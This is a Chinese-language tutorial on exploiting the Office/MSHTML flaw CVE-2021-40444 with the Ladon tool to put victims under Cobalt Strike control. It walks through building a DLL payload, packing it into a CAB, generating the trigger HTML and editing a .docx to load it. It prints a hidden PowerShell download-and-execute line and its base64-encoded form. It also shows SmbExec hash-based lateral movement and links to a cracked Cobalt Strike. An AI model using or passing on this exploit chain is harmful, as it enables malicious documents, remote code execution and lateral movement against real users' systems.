CVE-2021-40444 Office漏洞復現CS上線

漏洞概述

北京時間9月8日，微軟發布安全通告披露了Microsoft MSHTML 遠程代碼執行漏洞，攻擊者可通過製作惡意的 ActiveX 控制項供託管瀏覽器呈現引擎的 Microsoft Office文檔使用，成功誘導用戶打開惡意文檔後，可在目標系統上以該用戶權限執行任意代碼。微軟在通告中指出已檢測到該漏洞被在野利用，請相關用戶採取措施進行防護。

MSHTML（又稱為Trident）是微軟旗下的Internet Explorer 瀏覽器引擎，也用於 Office 應用程式，以在 Word、Excel 或 PowerPoint 文檔中呈現 Web 託管的內容。AcitveX控制項是微軟COM架構下的產物，在Windows的Office套件、IE瀏覽器中有廣泛的應用，利用ActiveX控制項即可與MSHTML組件進行交互。

影響版本

包括Windows 7/8/8.1/10，Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022

Ladon8.9更新功能

Ladon 8.9 2021.9.14
[+]CVE-2021-40444 Microsoft MSHTML遠程代碼執行漏洞，Office文檔利用模塊
影響版本: 

包括Windows 7/8/8.1/10，Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
[+]CmdDll cmd轉DLL(Win系統0day漏洞DLL執行命令payload，可直接powershell上線CobaltStrike)
  溢出漏洞如MS17010、本地提權CVE-2021-1675等，非溢出如最新的Office漏洞CVE-2021-40444等

Ladon 8.8 2021.911
[+]SmbExec NTLM-HASH非交互執行無回顯
[u]GetInfo  新增Vmware虛擬機信息
[u]OsScan   新增識別Vigor Router路由器識別
[u]新增Xen\VBOX\Hybrid\Parallels虛擬機識別
[+]GetInfo  新增cmdkey、RrpLog、安裝驅動、軟體列表、最近訪問文件等
[+]GetInfo  新增GUID、CPUID、硬碟ID、自啟動後門檢測(DLL卻持、註冊表等)
[+]GetInfo2 新增WMI補丁信息獲取
[+]默認信息 新增C盤剩餘空間信息小於2G高亮提示

ladon8.9模塊用法CmdDLL用法

Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=

請根據實際需要使用對應CMD命令生成DLL,例子為彈計算器

GUI版用法

http://k8gege.org/Ladon/cmddll.html

CVE-2021-40444用法

Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

PS：此模塊需使用Ladon40.exe

CVE-2021-40444復現測試環境

Win10 x64
0ffice 2019

安裝Office2019

隨便找個試用版就可以了，沒必要激活，如果下的是IMG把IMG改為ZIP解壓安裝即可。

CmdDll生成dll

CVE-2021-40444 MakeCab將DLL轉成CAB

由於目標是Win10 X64系統，所以我們使用64位的DLL，命令：Ladon CVE-2021-40444 MakeCab sc64.dll

CVE-2021-40444 MakeHtml生成Poc.html

生成html，URL需指向Ladon監聽的地址

啟動web監聽

doc樣本修改

樣本9月10號已發在小密圈，docx後綴改為cab或zip，即可編輯rels文件，指向Ladon監聽的地址poc.html，保存再改名為.docx

彈計算器演示

在win10上執行doc文件時，可通過Ladon監聽看到整個請求過程，docx先訪問html，由漏洞觸發加載我們封裝的CAB文件，通過CPL執行安裝INF，加載我們的DLL，演示DLL功能為彈計算器。

Cobalt Strike上線Base64加密

LadonGui—Encode–Base64Unicode加密

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.250.25:80/a'))"

PS：其它複雜CMD語句同理

生成DLL

Ladon.exe CmdDll b64x64 cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyADUAMAAuADIANQA6ADgAMAAvAGEAJwApACkAIgA=

CS上線演示

SmbExec用法

Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA

SmbExec執行

在Cobalt Strike的shell下執行SmbExec需要帶空格引號參數時，CS轉義有問題，使用正常CMD命令比較麻煩，所以我增加了個b64cmd參數便於在CS下使用(這個方法在幾個月前的BypassUac裡使用，很多人不知道為什麼這樣做，直接CMD命令不好嗎，非要經過一步加密，當你要執行的CMD命令含有很多轉義時你就知道了，得經過CS轉義成CMD轉義得到正常CMD很麻煩)。b64cmd命令可通過LadonGUI 8.2以後版本使用Base64Unicode加密生成

執行結果

Ladon其它橫向移動模塊ID模塊名稱功能說明用法1WmiExec135埠執行命令http://k8gege.org/Ladon/WinShell.html2PsExec445埠執行命令http://k8gege.org/Ladon/WinShell.html3AtExec445埠執行命令http://k8gege.org/Ladon/WinShell.html4SshExec22埠執行命令http://k8gege.org/Ladon/WinShell.html5JspShellJsp一句話執行命令http://k8gege.org/p/ladon_cs_shell.html6WebShellWebShell執行命令http://k8gege.org/Ladon/webshell.html7WinrmExec5895埠執行命令http://k8gege.org/Ladon/WinrmExec.html8SmbExec445埠HASH執行命令http://k8gege.org/Ladon/SmbExec.html

推薦文章

Ladon9.1簡明使用教程

巨龍拉冬: 讓你的Cobalt Strike變成超級武器

〖工具〗Cobalt Strike 3.12 3.13 4.3 4.4 K8破解版